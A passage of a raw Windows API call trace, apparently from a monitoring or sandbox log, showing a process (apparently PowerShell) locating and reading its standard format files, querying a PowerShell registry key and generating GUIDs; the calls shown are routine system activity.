nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.617] GetLastError () returned 0xcb [0052.617] SetErrorMode (uMode=0x1) returned 0x1 [0052.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0052.618] GetLastError () returned 0xcb [0052.618] SetErrorMode (uMode=0x1) returned 0x1 [0052.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.618] GetLastError () returned 0xcb [0052.618] SetErrorMode (uMode=0x1) returned 0x1 [0052.618] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0052.619] GetLastError () 
returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.619] GetLastError () returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0052.619] GetLastError () returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.619] GetLastError () returned 0xcb [0052.619] SetErrorMode (uMode=0x1) returned 0x1 [0052.619] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, 
ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: 
lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.620] GetLastError () returned 0xcb [0052.620] SetErrorMode (uMode=0x1) returned 0x1 [0052.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0052.620] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFileAttributesExW (in: 
lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.621] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb68 | out: lpFileInformation=0x14eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0052.621] GetLastError () returned 0xcb [0052.621] SetErrorMode (uMode=0x1) returned 0x1 [0052.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.622] GetLastError () returned 0xcb [0052.628] GetEnvironmentVariableW (in: 
lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.628] GetLastError () returned 0xcb [0052.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.628] GetLastError () returned 0xcb [0052.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.629] GetLastError () returned 0xcb [0052.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.629] GetLastError () returned 0xcb [0052.629] SetErrorMode (uMode=0x1) returned 0x1 [0052.630] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.630] GetLastError () returned 0x0 [0052.630] GetFileType (hFile=0x2f8) returned 0x1 [0052.630] SetErrorMode (uMode=0x1) returned 0x1 [0052.630] GetFileType (hFile=0x2f8) returned 0x1 [0052.630] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.642] GetLastError () returned 0x0 [0052.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.643] GetLastError () returned 0x0 [0052.643] ReadFile (in: hFile=0x2f8, 
lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.643] GetLastError () returned 0x0 [0052.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.643] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x9e2, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232ecb6, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232ecb6*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x232f734, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x232f734*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] CloseHandle (hObject=0x2f8) returned 1 [0052.644] GetLastError () returned 0x0 [0052.644] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.644] GetLastError () returned 0x0 [0052.644] SetErrorMode (uMode=0x1) returned 0x1 [0052.644] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23407f0 | out: lpFileInformation=0x23407f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0052.645] GetLastError () returned 0x0 [0052.645] SetErrorMode (uMode=0x1) returned 0x1 [0052.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.645] GetLastError () returned 0x0 [0052.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.645] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.645] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: 
lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.645] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.645] GetLastError () returned 0x0 [0052.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.645] GetLastError () returned 0x0 [0052.697] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x27fc746b, Data2=0xd3dd, Data3=0x4908, Data4=([0]=0xa3, [1]=0x79, [2]=0xb5, [3]=0x0, [4]=0xeb, [5]=0x50, [6]=0xa9, [7]=0xf4))) returned 0x0 [0052.705] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6b318506, Data2=0x6fa3, Data3=0x48fd, Data4=([0]=0xaa, [1]=0xd6, [2]=0xf0, [3]=0xe7, [4]=0xa5, [5]=0x7d, [6]=0x91, [7]=0x39))) returned 0x0 [0052.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.706] GetLastError () returned 0x0 [0052.706] SetErrorMode (uMode=0x1) returned 0x1 [0052.706] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 
0x2f8 [0052.706] GetLastError () returned 0x0 [0052.706] GetFileType (hFile=0x2f8) returned 0x1 [0052.706] SetErrorMode (uMode=0x1) returned 0x1 [0052.706] GetFileType (hFile=0x2f8) returned 0x1 [0052.707] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.708] GetLastError () returned 0x0 [0052.708] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.708] GetLastError () returned 0x0 [0052.708] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.708] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0xfb2, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x235322a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x235322a*, 
lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] ReadFile (in: hFile=0x2f8, lpBuffer=0x2353ad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2353ad8*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] CloseHandle (hObject=0x2f8) returned 1 [0052.709] GetLastError () returned 0x0 [0052.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.710] SetErrorMode (uMode=0x1) returned 0x1 [0052.710] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2374368 | out: lpFileInformation=0x2374368*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0052.710] GetLastError () returned 0x0 [0052.710] SetErrorMode (uMode=0x1) returned 0x1 [0052.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.710] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.710] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.710] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0052.710] GetLastError () returned 0x0 [0052.711] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x21d2533d, Data2=0x140f, Data3=0x4ccd, Data4=([0]=0xb3, [1]=0x11, [2]=0x31, [3]=0x6, [4]=0x13, [5]=0xf4, [6]=0x3a, [7]=0x95))) returned 0x0 [0052.711] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7573100, Data2=0xb190, Data3=0x4f3f, Data4=([0]=0x89, [1]=0x74, [2]=0x83, [3]=0xd4, [4]=0xbd, [5]=0x29, [6]=0x6d, [7]=0xa9))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb729993a, Data2=0xd2af, Data3=0x49e8, Data4=([0]=0xa0, [1]=0x44, [2]=0x93, [3]=0x9e, [4]=0xa7, [5]=0x52, [6]=0xd6, [7]=0x26))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: 
pguid=0x14e9d8*(Data1=0x6719ad0c, Data2=0xf4a9, Data3=0x4bbb, Data4=([0]=0x96, [1]=0xb2, [2]=0xae, [3]=0x77, [4]=0xd2, [5]=0x30, [6]=0x6a, [7]=0xcf))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6b684ea3, Data2=0xd0a5, Data3=0x4c7e, Data4=([0]=0x99, [1]=0x36, [2]=0xaa, [3]=0x9, [4]=0x3c, [5]=0xb2, [6]=0xea, [7]=0x4d))) returned 0x0 [0052.713] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x78d915ba, Data2=0xbfc9, Data3=0x4f90, Data4=([0]=0xa5, [1]=0x11, [2]=0x7b, [3]=0x12, [4]=0xf, [5]=0xe5, [6]=0x12, [7]=0xb7))) returned 0x0 [0052.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: 